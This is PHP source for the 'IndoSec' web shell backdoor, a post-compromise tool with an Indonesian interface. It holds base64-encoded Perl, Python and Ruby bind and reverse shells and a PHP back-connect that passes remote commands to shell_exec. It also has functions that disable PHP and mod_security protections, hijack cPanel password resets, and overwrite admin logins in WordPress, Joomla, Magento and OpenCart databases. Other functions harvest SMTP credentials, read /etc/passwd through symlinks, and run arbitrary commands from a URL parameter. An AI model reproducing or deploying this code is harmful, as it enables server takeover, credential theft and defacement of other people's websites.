';$temp = trim($temp); $file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)){ $s = fgets($file);$matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; $dcount++; } fclose($file); echo "
ID. Users symlink
".$dcount." ".$matches." Symlink
"; unlink("test.txt"); } } } exit; } function aksiSymread($dir,$file){ echo "read /etc/named.conf

"; if(isset($_GET['save'])){ $cont = stripcslashes($_POST['file']); $f = fopen('named.txt','w'); $w = fwrite($f,$cont); if($w){ echo '
successfully'; } fclose($f); } exit; } function sym404($dir,$file){ $cp = get_current_user(); if($_POST['execute']){ @rmdir("indosec_sym404"); @mkdir("indosec_sym404", 0777); $dir = $_POST['dir']; $isi = $_POST['isi']; @system("ln -s ".$dir."indosec_sym404/".$isi); @symlink($dir,"indosec_sym404/".$isi); $inija = fopen("indosec_sym404/.htaccess", "w"); @fwrite($inija,"ReadmeName ".$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain php html php5 phtml\nAddHandler text/plain php html php5 phtml\nSatisfy Any"); echo'Click Me!!'; }else{ echo '

Symlink 404

File Target:
Save As:

NB: Letak wp-config tidak semuanya berada di public_html/wp-config.php jadi silahkan ubah sesuai letaknya.

'; } exit; } function symBypass($dir,$file){ $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"]; $u = explode("/",$pageFTP ); $pageFTP =str_replace($u[count($u)-1],"",$pageFTP ); if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){ $cont = stripcslashes($_POST['file']); if(!file_exists('passwd.txt')){ $f = @fopen('passwd.txt','w'); $w = @fwrite($f,$cont); fclose($f); } if($w or @filesize('passwd.txt') > 0){ echo "
"; flush(); $fil3 = file('passwd.txt'); foreach ($fil3 as $f){ $u=explode(':', $f); $user = $u['0']; echo ""; flush(); flush(); } echo "
Users symlink FTP
$user Symlink FTP
"; die(); } } echo "read /etc/passwd error ? Bypass Here

"; flush(); exit; } function bcTool($dir,$file){ echo "

Back Connect Tools

Bind port to /bin/sh [Perl]
Back-Connect
"; if($_POST['bpl']){ $bp = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="); $brt = @fopen('bp.pl','w'); fwrite($brt,$bp); $out = exe("perl bp.pl ".$_POST['port']." 1>/dev/null 2>&1 &"); sleep(1); echo "
$out\n".exe("ps aux | grep bp.pl")."
"; unlink("bp.pl"); } if($_POST['backconnect'] == 'perl'){ $bc = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"); $plbc = @fopen('bc.pl','w'); fwrite($plbc,$bc); $out = exe("perl bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &"); sleep(1); echo "
$out\n".exe("ps aux | grep bc.pl")."
"; unlink("bc.pl"); } if($_POST['backconnect'] == 'python'){ $becaa = base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk="); $pbcaa = @fopen('bcpyt.py','w'); fwrite($pbcaa,$becaa); $out1 = exe("python bcpyt.py ".$_POST['server']." ".$_POST['port']); sleep(1); echo "
$out1\n".exe("ps aux | grep bcpyt.py")."
"; unlink("bcpyt.py"); } if($_POST['backconnect'] == 'ruby'){ $becaak = base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k"); $pbcaak = @fopen('bcruby.rb','w'); fwrite($pbcaak,$becaak); $out2 = exe("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']); sleep(1); echo "
$out2\n".exe("ps aux | grep bcruby.rb")."
"; unlink("bcruby.rb"); } if($_POST['backconnect'] == 'php'){ $ip = $_POST['server']; $port = $_POST['port']; $sockfd = fsockopen($ip , $port , $errno, $errstr ); if($errno != 0){ echo "$errno : $errstr"; }else if (!$sockfd){ $result = "

Unexpected error has occured, connection may have failed.

"; }else{ fputs ($sockfd ," \n{#######################################} \n..:: BackConnect PHP By Con7ext ::.. \n{#######################################}\n"); $dir = @shell_exec("pwd"); $sysinfo = @shell_exec("uname -a"); $time = @Shell_exec("time"); $len = 1337; fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n"); while(!feof($sockfd)){ $cmdPrompt = '[kuda]#:> '; @fputs ($sockfd , $cmdPrompt ); $command= fgets($sockfd, $len); @fputs($sockfd , "\n" . @shell_exec($command) . "\n\n"); } @fclose($sockfd); } } exit; } function disabFunc($dir,$file){ echo "

Bypass Disable Functions

"; if(isset($_POST['ini'])){ $file = fopen("php.ini","w"); echo fwrite($file,"safe_mode = OFF\ndisable_functions = NONE"); fclose($file); echo "Klik Coeg!"; }elseif(isset($_POST['htce'])){ $file = fopen(".htaccess","w"); echo fwrite($file,"\nSecFilterEngine Off\nSecFilterScanPOST Off\n"); fclose($file); echo "

.htaccess successfully created!

"; }elseif(isset($_POST['litini'])){ $iniph = "PD8gZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbImZpbGUiXSk7DQplY2hvIGluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOw0KZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbInNzIl07DQo/Pg=="; $byph = "safe_mode = OFF\ndisable_functions = NONE"; $comp = "\nForceType application/x-httpd-php4\n"; file_put_contents("php.ini",$byph); file_put_contents("ini.php",$iniph); file_put_contents(".htaccess",$comp); $swa = "success"; $text = "Disable Functions in Litespeed Created"; swall($swa,$text,$dir); } echo "
"; } function resetCp($dir){ echo '
Auto Reset Password Cpanel
'; if(isset($_POST['submit'])){ $user = get_current_user(); $site = $_SERVER['HTTP_HOST']; $ips = getenv('REMOTE_ADDR'); $email = $_POST['email']; $wr = 'email:'.$email; $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w'); @fwrite($f, $wr); @fclose($f); $f = fopen('/home/'.$user.'/.contactinfo', 'w'); @fwrite($f, $wr); @fclose($f); $parm = $site.':2082/resetpass?start=1'; echo '
Url: '.$parm.''; echo '
Username: '.$user.''; echo '
Success Reset To: '.$email.'

'; } exit; } function autoEdit($dir,$file){ if($_POST['hajar']){ if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6){ echo "Username dan Password harus lebih dari 6 karakter"; }else{ $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf){ if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/JConfig|joomla/",$config)){ $dbhost = ambilkata($config,"host = '","'"); $dbuser = ambilkata($config,"user = '","'"); $dbpass = ambilkata($config,"password = '","'"); $dbname = ambilkata($config,"db = '","'"); $dbprefix = ambilkata($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = ambilkata($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Joomla
"; if($site == ''){ echo "Sitename => error, gabisa ambil nama domain nya
"; }else{ echo "Sitename => $site
"; } if(!$update OR !$conn OR !$db){ echo "Status => ".mysql_error()."

"; }else{ echo "Status => Sukses!

"; } mysql_close($conn); }elseif(preg_match("/WordPress/",$config)){ $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == ''){ $url_target = "Login => Error, Tidak dapat mengambil nama domainnya
"; }else{ $url_target = "Login => $target/wp-login.php
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Wordpress
"; echo $url_target; if(!$update OR !$conn OR !$db){ echo "Status => ".mysql_error()."

"; }else{ echo "Status => Sukses!

"; } mysql_close($conn); }elseif(preg_match("/Magento|Mage_Core/",$config)){ $dbhost = ambilkata($config,""); $dbuser = ambilkata($config,""); $dbpass = ambilkata($config,""); $dbname = ambilkata($config,""); $dbprefix = ambilkata($config,""); $prefix = $dbprefix."admin_user"; $option = $dbprefix."core_config_data"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if($target == ''){ $url_target = "Login => Error, Tidak dapat mengambil nama domainnya
"; }else{ $url_target = "Login => $target/admin/
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Magento
"; echo $url_target; if(!$update OR !$conn OR !$db){ echo "Status => ".mysql_error()."

"; }else{ echo "Status => Sukses!

"; } mysql_close($conn); }elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)){ $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); $dbname = ambilkata($config,"'DB_DATABASE', '","'"); $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER', '","'"); if($target == ''){ $url_target = "Login => Error!
"; }else{ $url_target = "Login => $target
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => OpenCart
"; echo $url_target; if(!$update OR !$conn OR !$db){ echo "Status => ".mysql_error()."

"; }else{ echo "Status => Sukses!

"; } mysql_close($conn); }elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)){ $dbhost = ambilkata($config,'server = "','"'); $dbuser = ambilkata($config,'username = "','"'); $dbpass = ambilkata($config,'password = "','"'); $dbname = ambilkata($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == ''){ $target2 = $result[url]; $url_target = "Login => Error, Tidak dapat mengambil nama domainnya
"; if($target2 == ''){ $url_target2 = "Login => Error, Tidak dapat mengambil nama domainnya
"; }else{ $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)){ $url_target2 = "Login => $target2/adminweb
"; }elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)){ $url_target2 = "Login => $target2/lokomedia/adminweb
"; }else{ $url_target2 = "Login => $target2 [ Error! ]
"; } } }else{ $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)){ $url_target = "Login => $target/adminweb
"; }elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)){ $url_target = "Login => $target/lokomedia/adminweb
"; }else{ $url_target = "Login => $target [ Error! ]
"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo "Config => ".$file_conf."
"; echo "CMS => Lokomedia
"; if(preg_match('/Error, Tidak dapat mengambil nama domainnya/', $url_target)){ echo $url_target2; }else{ echo $url_target; } if(!$update OR !$conn OR !$db){ echo "Status => ".mysql_error()."

"; }else{ echo "Status => Sukses!

"; } mysql_close($conn); } } } }else{ echo "

Auto Edit User

Lokasi Dir Config
Set User & Pass :

NB: work in folder config ( ex: /home/user/public_html/nama_folder_config )

"; } exit; } function ransom($dir,$file){ if(isset($_POST["encrypt"])) { $dir = $_POST["path"]; echo"
"; }else{ echo '

Ransomware

'; } exit; } function scj($dir){ $dirs = scandir($dir); foreach($dirs as $dirb){ if(!is_file("$dir/$dirb")) continue; $ambil = file_get_contents("$dir/$dirb"); $ambil = str_replace("$", "", $ambil); if(preg_match("/JConfig|joomla/", $ambil)){ $smtp_host = ambilkata($ambil,"smtphost = '","'"); $smtp_auth = ambilkata($ambil,"smtpauth = '","'"); $smtp_user = ambilkata($ambil,"smtpuser = '","'"); $smtp_pass = ambilkata($ambil,"smtppass = '","'"); $smtp_port = ambilkata($ambil,"smtpport = '","'"); $smtp_secure = ambilkata($ambil,"smtpsecure = '","'"); echo "
SMTP Host: $smtp_host
SMTP Port: $smtp_port
SMTP User: $smtp_user
SMTP Pass: $smtp_pass
SMTP Auth: $smtp_auth
SMTP Secure: $smtp_secure
"; } } echo "

NB : work in folder config ( ex: /home/user/public_html/namafolder_config )

"; exit; } function bypasscf(){ echo '
Bypass Cloud Flare
'; $target = $_POST['target']; if($_POST['idsPilih'] == "ftp"){ $ftp = gethostbyname("ftp."."$target"); echo "

Correct ip is : $ftp

"; } if($_POST['idsPilih'] == "direct-conntect"){ $direct = gethostbyname("direct-connect."."$target"); echo "

Correct ip is : $direct

"; } if($_POST['idsPilih'] == "webmail"){ $web = gethostbyname("webmail."."$target"); echo "

Correct ip is : $web

"; } if($_POST['idsPilih'] == "cpanel"){ $cpanel = gethostbyname("cpanel."."$target"); echo "

Correct ip is : $cpanel

"; } exit; } function zipMenu($dir,$file){ //Compress/Zip $exzip = basename($dir).'.zip'; function Zip($source, $destination){ if (extension_loaded('zip') === true){ if (file_exists($source) === true){ $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true){ $source = realpath($source); if (is_dir($source) === true){ $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file){ $file = realpath($file); if (is_dir($file) === true){ // $zip->addEmptyDir(str_replace($source . '/', '', $file . '/')); }elseif(is_file($file) === true){ $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file)); } } }elseif(is_file($source) === true){ $zip->addFromString(basename($source), file_get_contents($source)); } } return @$zip->close(); } } return false; } //Extract/Unzip function Zip_Extrack($zip_files, $to_dir){ $zip = new ZipArchive(); $res = $zip->open($zip_files); if ($res === TRUE){ $name = basename($zip_files, ".zip")."_unzip"; @mkdir($name); @$zip->extractTo($to_dir."/".$name); return @$zip->close(); }else{ return false; } } echo '

Zip Menu

'; if($_POST["upnun"]){ $filename = $_FILES["zip_file"]["name"]; $tmp = $_FILES["zip_file"]["tmp_name"]; if(move_uploaded_file($tmp, "$dir/$filename")){ echo Zip_Extrack($filename, $dir); unlink($filename); $swa = "success"; $text = "Berhasil Mengekstrak Zip"; swall($swa,$text,$dir); }else{ echo "Gagal!"; } } echo "
Zip Backup
"; if($_POST['backup']){ $fol = $_POST['folder']; if(Zip($fol, $_POST["folder"].'/'.$exzip)){ $swa = "success"; $text = "Berhasil Membuat Zip"; swall($swa,$text,$dir); }else{ echo "Gagal!"; } } echo "
Unzip Manual
"; if($_POST['extrak']){ $zip = $_POST["file_zip"]; if (Zip_Extrack($zip, $dir)){ $swa = "success"; $text = "Berhasil Mengekstrak Zip"; swall($swa,$text,$dir); }else{ echo "Gagal!"; } } echo '
'; } ?> { IndoSec sHell }

{ INDOSEC }

Shell Backdoor

Home Upload Buat File Buat Folder Mass Deface Mass Delete Jumping Config Adminer Symlink Network Auto Reset Cpanel Auto Edit User Ransomware SMTP Grabber Bypass Cloud Flare Zip Menu About Us keluar

Terminal :

Informasi :
PHP : '.$ver.'
IP Server : '.$ip.'
HDD Total : '.formatSize($total).' Free : '.formatSize($free).' ['.$pers.'%]
Domain : '.$dom.'
MySQL : '.$mysql.'
cURL : '.$curl.'
Mailer : '.$mail.'
Disable Function : '.$show_ds.'
Software : '.$sof.'
Sistem Operasi : '.$os.'

'; if (isset($_GET['keluar'])){ session_start(); session_destroy(); echo ''; } if(isset($_GET['cmd'])){ echo "
".exe($_GET['cmd'])."
